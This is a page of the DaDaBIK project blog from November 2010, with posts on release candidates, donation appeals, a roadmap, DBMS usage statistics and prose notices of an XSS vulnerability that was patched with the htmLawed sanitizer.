Blog

4.3 rc1 is out, new admin section, last security patch, PLEASE UPGRADE!

Posted by Eugenio on 23 Nov 2010

Hi all,
the version 4.3 release candidate 1 is out; I think it's a milestone in the DaDaBIK road map: many bugs fixed and a new admin section. I hope the 4.3 final release will be available soon, but the idea is to come out with something that can produce applications very close to the enterprise level quality without coding so I want to wait your feedback on this rc1.

From the security side, DaDaBIK 4.3 beta3 in a case-sensitive environment didn't include the htmLawed library; this left DaDaBIK exposed to the security risk that version 4.3 beta3 was supposed to fix; now the problem is solved and also another (potential) security problem has been fixed as you can see from the changelog (where you can find the complete list of changes and bug fixes related to the version 4.3 rc1). So you really need to upgrade!

Teh new admin section, a lot of work: new look, some improvements in the interface, in-line help for the interface configurator, possibility to send feedback, to donate and to buy email/phone commercial support. The configuration file has been improved in clarity too.
Furthermore, the documentation has been completely revised, clarifying some aspects when needed and highlighting some new known bugs/limitations.

A completely new demo is also available, it's an enterprise-oriented application: a simplified invoicing system.

Donations: I'm very happy to see that, just during the last 15 days, 33 people decided to give some money to the project. But it's stil a very small fraction of all the people who download DaDaBIK (a lot) and it's not enough to dedicate a fixed amount of time to the project like I'm doing at the moment. Please have a look to other commercial softwares similar to DaDaBIK, then come back here and think if it's fair or not to donate some euros if you use DaDaBIK, considering the plus of having the source code available.

My road map (an update soon in the section) is quite clear now: a couple of 4.x which fill fix some bugs and/or introduce some small new features and try to enlarge the users base introducing the support for SQLite, IBM DB2 and (maybe) Microsoft Access, then (in 6/7 months) a version 5.0 which will come out with (maybe) some code refactoring but first of all with a completely new security/permission infrastructure with high granularity: the possibility to allow the user John to see just some fields of a table for example.
In order to follow the road map I need to be economically supported , this is the way to allow DaDaBIK to survive. If a compamy would like to sponsor the development of some new features (according to the company's and the project needs), it would also be very welcome.

Ciao,

DaDaBIK description in German and Spanish

Posted by Eugenio on 22 Nov 2010

We now have a description of what DaDaBIK is even in Spanish and German.
Thanks a lot to my friends Juan García and
Georgi Kobilarov!

I want to seize the moment to let you a couple of links to visit: http://www.solidarybikes.org, a charity and "green" initiative by Juan and a friend of him; http://uberblic.com the research & development company founded by Georgi that works mainly on data integration and linked data.

Ciao,

Security Risk, second patch. PLEASE UPGRADE!

Posted by Eugenio on 15 Nov 2010

Hi all,
a new beta version (DaDaBIK 4.3 beta3) has been released in order to solve the second problem I post about a few days ago, the one related to the use of the html content type. First of all it is better to highlight that the problem could arise not only with the html content type but also with the rich_editor field type (together with another content type than html); I think the rich_editor is usually used together with the html content type (it should be) but maybe someone used this in conjunction with other content types.

After having looked at some HTML sanitization libraries, I finally choosed htmLawed. It seems to me that at the moment htmlpurifier is the most effective one in recognizing malicious code, but it appears to me too complex, heavy and it also doesn't support PHP 4. htmLawed seems a good compromise.

The library is now used to filter the content (html content type and rich_editor field type) before displaying it. You must however keep in mind that, as the documentation states, there are some minor cases in which htmLawed can fail.
Since some people asked me about previous releases, as I already told in a comment, the security issues highlighted during the last days also affect the older releases of DaDaBIK and not just the last one.

See the changelog for other details. The documentation has also been updated; if you have read the on-line documentation this morning there was a mistake about the version was related to: the documentation content was the new one (related to 4.3 beta3, already patched with htmLawed) but it stated to be about the 4.3 beta2 (which is not patched with htmLawed) so be sure to read the right one (the on-line mistake has now been corrected) in order to avoid misunderstandings about the security problems that affect your version.



Ciao,

Security Risk, PLEASE UPGRADE!

Posted by Eugenio on 11 Nov 2010

Hi all,
last night I discovered an important security hole in DaDaBIK so I decided to immediately release a version 4.3 beta2 with the only purpose of partially fixing it. All the other bug fixes and new features are waiting for the version 4.3 rc1, avaiable in 1 or 2 weeks as expected.

Here is the problem: if in a DaDaBIK application the insert or edit feature was enabled (at least for one table) and a select_single field type was used (at least once, even in another table), a malicious user who had access to the application could in many cases insert in a listbox some arbitrary javascript code, which was then executed by other users just by using the application.
Among other problems, this could lead to XSS attack (http://en.wikipedia.org/wiki/Cross-site_scripting), which in turn could allow an unauthorized access to the application (http://en.wikipedia.org/wiki/Session_hijacking) and, if the Internet browser of the user contained security holes, even the execution of arbitrary code in the client machine.

The new 4.3 beta2 solves this problem. Even the DaDaBIK demo was affected and exploited by a malicious user; now it has been patched.

The problems described above can however occur even when the insert or edit feature was enabled (at least for one table) and the HTML content type is used; at the moment there isn't a patch for this second scenario, so the HTML content type should be used very carefully, as highlighted in the upgraded documentation. In the next few days, I would like to use something like http://htmlpurifier.org to allow the users to insert html text without security problems.

The 4.3 beta2 also fixes another minor GUI bug, as you can read from the changelog.

Ciao,

Is DaDaBIK still used with non-MySQL DBMSs?

Posted by Eugenio on 9 Nov 2010

Starting with the last 4.3 beta, the users can register the installation of DaDaBIK; I receive information about DBMS type and DaDaBIK version.
97 installations have been registered so far and these are the statistics about the DBMSs usage:
MySQL: 95 installations
PostgreSQL: 2 installations
Oracle: 0 installations
MS SQL Server: 0 installations

97 is (statistically) still a small number but I'm wondering if DaDaBIK is still used with non-MySQL DBMSs....maybe the tipical Oracle or MS SQL Server user doesn't work much with PHP but I think that it's not true for a PostgreSQL user.

I decided to dedicate some time in future to test DaDaBIK with other DBMSs (SQLite and DB2) but if everybody's using MySQL I don't know if it's still a good idea.

Page 18 of 28
<  11  12  13  14  15  16  17  18  19  20  >  

Top